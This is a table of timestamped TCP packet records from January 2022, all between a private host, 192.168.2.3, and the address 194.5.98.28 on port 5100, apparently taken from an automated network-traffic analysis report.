Jan 13, 2022 15:33:43.127154112 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.127177000 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.127181053 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.127197027 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.127202988 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.127208948 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.127228975 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.127252102 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.127264023 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.127433062 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.127460003 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.127485991 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.127509117 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.127607107 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.127652884 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.127733946 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.127757072 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.127784967 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.127809048 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.127862930 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.127909899 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.128177881 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.128276110 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.128285885 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.128309965 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.128329039 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.128340006 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.128346920 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.128413916 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.128429890 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.128434896 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.128495932 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.128653049 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.128711939 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.128766060 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.128817081 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.128941059 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.129004002 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.131586075 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131606102 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131623030 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131639004 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131654978 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131664038 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.131669998 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131675005 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.131689072 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131704092 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131709099 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.131720066 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131722927 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.131736994 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.131771088 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131762028 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.131789923 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131805897 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131818056 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.131870031 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.131876945 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131895065 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131911993 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131928921 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131934881 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.131946087 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131951094 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.131963015 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131979942 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.131992102 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.131998062 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.132002115 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.132014036 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.132030010 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.132044077 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.132045984 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.132052898 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.132062912 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.132078886 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.132091045 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.132096052 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.132107973 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.132112026 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.132128000 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.132136106 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.132144928 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.132162094 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.132164955 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.132180929 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.132224083 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.132312059 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.132354021 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:47.083400011 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:47.299392939 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:47.299967051 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:47.307575941 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:47.549026012 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:47.549094915 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:47.828056097 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:47.828156948 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:48.047777891 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:48.048013926 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:48.327054977 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:48.327136993 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:48.592962980 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:48.593110085 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:48.865355968 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:48.865444899 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:48.885350943 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:48.885430098 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:48.885505915 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:48.885562897 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:48.885631084 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:48.885658026 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:48.885680914 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:48.885709047 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.104358912 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.104414940 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.104438066 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.104454041 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.104465961 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.104496002 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.104501009 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.104542017 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.105473042 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.105515957 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.105535030 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.105555058 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.105556011 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.105592966 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.105602980 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.105638027 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.209304094 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.324115038 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.324203968 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.324604034 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.324652910 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.327723026 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.327764988 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.327785969 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.327811003 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.333213091 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.333254099 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.333281040 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.333292961 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.333312035 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.333329916 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.333334923 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.333369970 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.333380938 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.333408117 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.333410025 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.333446980 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.333456993 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.333484888 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.333496094 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.333523989 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.333544016 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.333560944 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.333571911 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.333599091 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.333611965 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.333637953 CET	5100	49822	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:49.333640099 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:49.333681107 CET	49822	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:53.549602032 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:53.765695095 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:53.765861034 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:53.767021894 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:54.045866966 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:54.045970917 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:54.056170940 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:54.097327948 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:54.312608004 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:54.312700987 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:54.529726028 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:54.529874086 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:54.813148975 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:54.813230991 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.092502117 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.092633009 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.357479095 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.357549906 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.413986921 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.414062023 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.414083958 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.414200068 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.414309978 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.414398909 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.414410114 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.414444923 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.623164892 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.623967886 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.630561113 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.630594969 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.630662918 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.630676985 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.630738974 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.630776882 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.630934954 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.630934000 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.631002903 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.631474018 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.631506920 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.631532907 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.631642103 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.631688118 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.819032907 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.848691940 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.848777056 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.849000931 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.849075079 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.849222898 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.849247932 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.849271059 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.849298000 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.849411011 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.849462986 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.849651098 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.849700928 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.849709034 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.849776030 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.849808931 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.849879980 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.850018978 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.850087881 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.850095987 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.850128889 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.850179911 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.850220919 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.850255966 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.850310087 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.850404978 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.850450039 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.850589991 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.850637913 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.850672007 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.850739956 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:55.850861073 CET	5100	49825	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:55.850915909 CET	49825	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:59.976370096 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:00.192332029 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:00.192473888 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:00.193409920 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:00.448441029 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:00.449939013 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:00.717396021 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:00.717652082 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:00.933825970 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:00.934210062 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:01.200858116 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:01.204943895 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:01.483355045 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:01.483472109 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:01.749980927 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:01.750046968 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:01.769977093 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:01.770035028 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:01.770068884 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:01.770076990 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:01.770102978 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:01.770127058 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:01.770148039 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:01.770180941 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:01.988012075 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:01.988059998 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:01.988101006 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:01.988102913 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:01.988121986 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:01.988140106 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:01.988154888 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:01.988194942 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:01.988207102 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:01.988235950 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:01.988264084 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:01.988282919 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:01.988621950 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:01.988801956 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:01.988852024 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:01.988864899 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.020206928 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.207365990 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.207431078 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.207509041 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.207797050 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.207901955 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.207968950 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.208019972 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.208026886 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.208038092 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.208060026 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.208105087 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.208163023 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.208173037 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.208178043 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.208479881 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.208540916 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.208575964 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.208585978 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.208707094 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.208766937 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.208781004 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.208786964 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.209235907 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.209286928 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.209289074 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.209412098 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.209415913 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.209521055 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.209541082 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.209593058 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:02.209619045 CET	5100	49827	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:02.209762096 CET	49827	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:06.247471094 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:06.463876963 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:06.464003086 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:06.471887112 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:06.739260912 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:06.739386082 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:07.008136034 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:07.008290052 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:07.225346088 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:07.225601912 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:07.498745918 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:07.498944044 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:07.780611038 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:07.780719995 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:07.821831942 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:07.821906090 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:07.822181940 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:07.822204113 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:07.822222948 CET	5100	49828	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:07.822237015 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:07.822257042 CET	49828	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:08.048448086 CET	5100	49828	194.5.98.28	192.168.2.3
